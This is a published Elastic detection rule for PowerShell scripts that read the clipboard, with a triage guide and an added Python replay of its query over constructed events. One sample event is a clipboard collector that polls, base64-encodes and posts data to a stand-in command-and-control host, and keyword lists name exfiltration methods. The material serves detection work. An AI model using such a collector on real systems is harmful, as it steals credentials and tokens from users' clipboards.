PowerShell Suspicious Script with Clipboard Retrieval Capabilities
Detects PowerShell script block content that retrieves clipboard data using Get-Clipboard or Windows clipboard APIs. Adversaries can collect copied credentials, tokens, or other sensitive data from the clipboard.
Elastic rule (View on GitHub)
[metadata]
creation_date = "2023/01/12"
integration = ["windows"]
maturity = "production"
updated_date = "2026/01/26"

[rule]
author = ["Elastic"]
description = """
Detects PowerShell script block content that retrieves clipboard data using Get-Clipboard or Windows clipboard APIs.
Adversaries can collect copied credentials, tokens, or other sensitive data from the clipboard.
"""
from = "now-9m"
index = ["winlogbeat-*", "logs-windows.powershell*"]
language = "kuery"
license = "Elastic License v2"
name = "PowerShell Suspicious Script with Clipboard Retrieval Capabilities"
note = """## Triage and analysis

> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.

### Investigating PowerShell Suspicious Script with Clipboard Retrieval Capabilities

This alert indicates PowerShell script block content associated with clipboard access. The matched script may use the Get-Clipboard cmdlet or Windows clipboard APIs (for example, Windows.Forms.Clipboard or related UI components) to retrieve user-copied data. Clipboard collection is often opportunistic and may be used to capture credentials, tokens, and other sensitive information copied during normal workflows.

#### Key alert fields to review

- `user.name`, `user.domain`, `user.id`: Account execution context for correlation, prioritization, and scoping.
- `host.name`, `host.id`: Host execution context for correlation, prioritization, and scoping.
- `powershell.file.script_block_text`: Script block content that matched the detection logic.
- `powershell.file.script_block_id`, `powershell.sequence`, `powershell.total`: Script block metadata to pivot to other fragments or reconstruct full script content when split across multiple events.
- `file.path`, `file.directory`, `file.name`: File-origin context when the script block is sourced from an on-disk file.
- `powershell.file.script_block_length`: Script block length (size) context.

#### Possible investigation steps

- Review `powershell.file.script_block_text` to understand the clipboard access technique and usage pattern:
  - Get-Clipboard usage versus .NET/UI based access (for example, Windows.Forms.Clipboard, Windows.Clipboard, TextBox.Paste, or methods such as GetText).
  - Whether clipboard access appears to be a one-time action or part of repeated/polled collection logic (for example, loops, timers, or repeated calls in the same script).
- Reconstruct the complete script when content is split across multiple events:
  - Pivot on `powershell.file.script_block_id` and order related events by `powershell.sequence` to rebuild the full script up to `powershell.total`.
  - Use `powershell.file.script_block_length` as context for unusually large scripts, which may indicate additional functionality beyond clipboard retrieval.
- Evaluate intent by reviewing surrounding logic in `powershell.file.script_block_text`:
  - Where clipboard contents are stored (variables, arrays, buffers) and whether the script transforms data after retrieval (for example, encoding, compression, string manipulation, or obfuscation).
  - Any indications of staging or transfer behavior following clipboard access (for example, writing data to disk or preparing network requests).
- Validate provenance and expected use:
  - Use `user.name`, `user.domain`, and `user.id` to determine whether the execution context is expected to run PowerShell that interacts with the clipboard.
  - Use `host.name` and `host.id` to determine whether the affected host is a typical endpoint for interactive clipboard use or an unusual target for clipboard collection.
  - If `file.path`, `file.directory`, or `file.name` are present, assess whether the script source is expected for the user and host, and whether it is located in a user-writable or temporary location.
- Determine execution context and whether the activity is user-driven or automated:
  - Correlate activity for the same `host.id` and `user.id` with process execution telemetry (if available) to identify the PowerShell host and its parent process, and whether execution was interactive or automated.
  - If authentication telemetry is available, correlate nearby logon activity for the same user and host to identify newly established sessions or unusual remote access preceding the alert.
- Scope and prevalence:
  - Search for other script block events with similar clipboard-related strings in `powershell.file.script_block_text` for the same `user.id` and `host.id`, and then across other hosts to identify reuse.
  - Look for reuse of the same `file.name` or `file.path` across hosts, which can indicate shared tooling or broader distribution.
- Assess impact and potential exposure:
  - If the script suggests repeated clipboard reads or immediate staging/transfer behavior, treat clipboard contents handled by the affected user on the host during the timeframe as potentially exposed and prioritize investigation accordingly.

### False positive analysis

- Clipboard retrieval can be legitimate in user productivity scripts, developer/test utilities, and administrative automation that transforms or inserts copied content into other workflows.
- Benign activity is more likely when the script source (`file.path`/`file.name`) aligns with known internal tooling, the user context is expected, and the script block text shows clear user-facing intent without follow-on staging or transfer behavior.
- False positives are less likely when clipboard access is repeated or automated, appears on atypical hosts for interactive use, or is coupled with suspicious handling of the retrieved data (for example, encoding, buffering, or writing to unexpected locations).

### Response and remediation

- If the activity is confirmed benign, document the script, expected users/hosts, and the business justification. Ensure the script source is maintained under change control to detect unauthorized modifications.
- If suspicious or malicious activity is suspected:
  - Contain the affected host to prevent further collection and preserve evidence.
  - Preserve relevant artifacts, including all related script block events for the `powershell.file.script_block_id` and any referenced script file from `file.path` (if present).
  - Investigate for downstream handling of clipboard data (staging or transfer) using available endpoint, file, network, and authentication telemetry scoped to `host.id` and `user.id`.
  - Assess potential credential or token exposure for the affected user and initiate credential hygiene actions appropriate to your environment.
  - Remove or remediate the execution source (malicious scripts or unauthorized automation) and investigate for persistence mechanisms that could re-run the clipboard collection.
  - Expand scoping by hunting for the same clipboard retrieval patterns in `powershell.file.script_block_text`, and for reuse of the same `file.name`/`file.path` across other hosts.
  - Capture lessons learned and update monitoring and access controls to reduce future abuse of PowerShell-based collection techniques while preserving required operational use cases.
"""
references = [
  "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-clipboard",
  "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-ClipboardContents.ps1",
]
risk_score = 47
rule_id = "92984446-aefb-4d5e-ad12-598042ca80ba"
setup = """## Setup

PowerShell Script Block Logging must be enabled to generate the events used by this rule (e.g., 4104).
Setup instructions: https://ela.st/powershell-logging-setup
"""
severity = "medium"
tags = [
  "Domain: Endpoint",
  "OS: Windows",
  "Use Case: Threat Detection",
  "Tactic: Collection",
  "Data Source: PowerShell Logs",
  "Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "query"

query = '''
event.category:process and host.os.type:windows and
(
  (
    powershell.file.script_block_text : (
      "Windows.Clipboard" or
      "Windows.Forms.Clipboard" or
      "Windows.Forms.TextBox"
    ) and
    powershell.file.script_block_text : (
      "]::GetText" or
      ".Paste()"
    )
  ) or
  powershell.file.script_block_text : "Get-Clipboard"
) and
  not powershell.file.script_block_text : (
    "sentinelbreakpoints" and "Set-PSBreakpoint" and "PowerSploitIndicators"
  ) and
  not user.id : "S-1-5-18" and
  not (
    file.path : *WindowsPowerShell\\Modules\\*.ps1 and
    file.name : ("Convert-ExcelRangeToImage.ps1" or "Read-Clipboard.ps1")
  ) and
  not powershell.file.script_block_text : (
    "Set-Alias -Name \"gcb\" -Value \"Get-Clipboard\"" or
    "[Windows.Clipboard]::SetText($colorizedText" or
    "EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"
  )
'''


[[rule.filters]]

[rule.filters.meta]
negate = true
[rule.filters.query.wildcard."file.path"]
case_insensitive = true
value = "?:\\\\program?files\\\\powershell\\\\?\\\\Modules\\\\*.psd1"
[[rule.filters]]

[rule.filters.meta]
negate = true
[rule.filters.query.wildcard."file.path"]
case_insensitive = true
value = "?:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\*.psd1"
[[rule.filters]]

[rule.filters.meta]
negate = true
[rule.filters.query.wildcard."file.path"]
case_insensitive = true
value = "?:\\\\Program?Files\\\\WindowsPowerShell\\\\Modules\\\\*.ps?1"
[[rule.threat]]
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
id = "T1115"
name = "Clipboard Data"
reference = "https://attack.mitre.org/techniques/T1115/"


[rule.threat.tactic]
id = "TA0009"
name = "Collection"
reference = "https://attack.mitre.org/tactics/TA0009/"
[[rule.threat]]
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
id = "T1059"
name = "Command and Scripting Interpreter"
reference = "https://attack.mitre.org/techniques/T1059/"
[[rule.threat.technique.subtechnique]]
id = "T1059.001"
name = "PowerShell"
reference = "https://attack.mitre.org/techniques/T1059/001/"



[rule.threat.tactic]
id = "TA0002"
name = "Execution"
reference = "https://attack.mitre.org/tactics/TA0002/"

[rule.investigation_fields]
field_names = [
  "@timestamp",
  "user.name",
  "user.id",
  "user.domain",
  "powershell.file.script_block_text",
  "powershell.file.script_block_id",
  "powershell.sequence",
  "powershell.total",
  "file.path",
  "file.directory",
  "file.name",
  "process.pid",
  "host.name",
  "host.id",
  "powershell.file.script_block_length"
]
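The query above, together with the guide's "reconstruct the complete script" and "evaluate intent" steps, replayed offline in Python. This is an added example and not Elastic's code or part of the rule: each KQL clause is approximated as a case-insensitive substring or glob test (the real rule runs against analyzed text fields in Elasticsearch, so tokenization can differ), and the events, account SIDs, file paths, host and the helper names `rule_matches`, `reconstruct`, `review_intent`, `analyze` and `SAMPLE_EVENTS` are constructed for illustration. One point it makes concrete: the query is evaluated per 4104 event, so a script whose `[Windows.Forms.Clipboard]` reference and `::GetText()` call land in different fragments fires on neither fragment but matches once the fragments are joined by `powershell.file.script_block_id` and `powershell.sequence`, which is why the pivot step matters both in triage and when hunting.

```python
"""Offline replay of the rule's query plus the guide's reconstruction and intent-review
steps over constructed 4104-style events. Added example, not Elastic's code: each KQL
clause is approximated as a case-insensitive substring or glob test, not the ES analyzer."""
import fnmatch
from collections import defaultdict

# String literals copied from the rule's query and rule.filters.
API_TYPES = ("Windows.Clipboard", "Windows.Forms.Clipboard", "Windows.Forms.TextBox")
API_CALLS = ("]::GetText", ".Paste()")
CMDLET = "Get-Clipboard"
PSPLOIT_SELFTEST = ("sentinelbreakpoints", "Set-PSBreakpoint", "PowerSploitIndicators")
MODULE_EXCLUDED_NAMES = ("Convert-ExcelRangeToImage.ps1", "Read-Clipboard.ps1")
KNOWN_BENIGN = ('Set-Alias -Name "gcb" -Value "Get-Clipboard"',
                "[Windows.Clipboard]::SetText($colorizedText",
                "EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D")
PATH_FILTERS = (r"?:\program?files\powershell\?\Modules\*.psd1",  # the three negated
                r"?:\Windows\system32\WindowsPowerShell\v1.0\Modules\*.psd1",  # rule.filters,
                r"?:\Program?Files\WindowsPowerShell\Modules\*.ps?1")  # escaping undone

def _has(text, needle):
    return needle.lower() in text.lower()

def _glob(path, pattern):
    return fnmatch.fnmatchcase(path.lower(), pattern.lower())

def rule_matches(ev):
    """True when this one event, on its own, satisfies the query."""
    if ev.get("event.category") != "process" or ev.get("host.os.type") != "windows":
        return False
    text = ev.get("powershell.file.script_block_text", "")
    api_access = (any(_has(text, t) for t in API_TYPES)
                  and any(_has(text, c) for c in API_CALLS))
    if not (api_access or _has(text, CMDLET)):
        return False
    path, name = ev.get("file.path", ""), ev.get("file.name", "")
    excluded = (all(_has(text, s) for s in PSPLOIT_SELFTEST)  # PowerSploit self-test
                or ev.get("user.id") == "S-1-5-18"  # LocalSystem
                or (_glob(path, r"*WindowsPowerShell\Modules\*.ps1")
                    and name in MODULE_EXCLUDED_NAMES)
                or any(_has(text, s) for s in KNOWN_BENIGN)
                or any(_glob(path, p) for p in PATH_FILTERS))
    return not excluded

def reconstruct(events):
    """Group on script_block_id, order by sequence, and report whether every
    fragment 1..total was seen; returns {id: (joined_text, complete)}."""
    parts, totals = defaultdict(dict), {}
    for ev in events:
        sbid = ev["powershell.file.script_block_id"]
        parts[sbid][ev["powershell.sequence"]] = ev["powershell.file.script_block_text"]
        totals[sbid] = ev["powershell.total"]
    return {sbid: ("".join(p[i] for i in sorted(p)), set(p) == set(range(1, totals[sbid] + 1)))
            for sbid, p in parts.items()}

INTENT = {  # what happens to the clipboard contents after retrieval
    "polling": ("while", "start-sleep", "timers.timer", "register-objectevent"),
    "transform": ("tobase64string", "compress", "-bxor", "convertto-securestring"),
    "staging": ("out-file", "set-content", "add-content", ">>"),
    "transfer": ("invoke-webrequest", "invoke-restmethod", "net.webclient",
                 "uploadstring", "tcpclient", "send-mailmessage"),
}

def review_intent(text):
    low = text.lower()
    return {k: any(s in low for s in v) for k, v in INTENT.items()}

def analyze(events):
    """Per-fragment verdicts (what the rule sees) and per-script verdicts
    (what the analyst sees after reconstruction and intent review)."""
    per_event = [(ev["powershell.file.script_block_id"], ev["powershell.sequence"],
                  rule_matches(ev)) for ev in events]
    per_script = {}
    for sbid, (text, complete) in reconstruct(events).items():
        base = next(ev for ev in events if ev["powershell.file.script_block_id"] == sbid)
        per_script[sbid] = {"complete": complete, **review_intent(text),
                            "matches": rule_matches({**base, "powershell.file.script_block_text": text})}
    return per_event, per_script

def _ev(sbid, seq, total, text, user="S-1-5-21-1111-2222-3333-1001", path="", name=""):
    return {"event.category": "process", "host.os.type": "windows", "user.id": user,
            "file.path": path, "file.name": name, "powershell.file.script_block_id": sbid,
            "powershell.sequence": seq, "powershell.total": total,
            "powershell.file.script_block_text": text}

SAMPLE_EVENTS = [  # constructed, not captured telemetry
    # a1: one-shot productivity use; fires, but nothing happens to the data afterwards
    _ev("a1", 1, 1, "$u = (Get-Clipboard).Trim(); Set-Clipboard ($u -replace ' ', '')"),
    # b2: polling collector that script block logging split into two events
    _ev("b2", 1, 2, "Add-Type -AssemblyName System.Windows.Forms\n"
                    "$buf = ''; while ($true) { $c = [Windows.Forms.Clipboard]"),
    _ev("b2", 2, 2, "::GetText(); if ($c -ne $last) { $buf += $c; $last = $c }; Start-Sleep 5\n"
                    "$b = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($buf))\n"
                    "Invoke-WebRequest -Uri http://c2.example.invalid/up -Method POST -Body $b }"),
    # c3: same cmdlet, but run as LocalSystem, which the rule excludes
    _ev("c3", 1, 1, "Get-Clipboard | Out-File C:\\Temp\\clip.txt", user="S-1-5-18"),
    # d4: shipped module script on the module path, excluded by path and name
    _ev("d4", 1, 1, "function Read-Clipboard { Get-Clipboard -Raw }", name="Read-Clipboard.ps1",
        path=r"C:\Program Files\WindowsPowerShell\Modules\ImportExcel\7.8.0\Read-Clipboard.ps1"),
    # e5: alias definition on the rule's known-benign list
    _ev("e5", 1, 1, 'Set-Alias -Name "gcb" -Value "Get-Clipboard"'),
]
```

`analyze(SAMPLE_EVENTS)` returns a per-fragment list of `(script_block_id, sequence, fired)` and a per-script dict carrying the completeness flag, the rule verdict on the rebuilt text and the four intent flags. On the constructed events only `a1` fires as logged; `b2` fires only after reconstruction and is the one that carries polling, transform and transfer indicators, while `c3`, `d4` and `e5` are suppressed by the rule's own exclusions regardless of what they do with the data.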
Related rules
- Exchange Mailbox Export via PowerShell
- PowerShell Keylogging Script
- PowerShell Mailbox Collection Script
- PowerShell Suspicious Script with Audio Capture Capabilities
- Encrypting Files with WinRar or 7z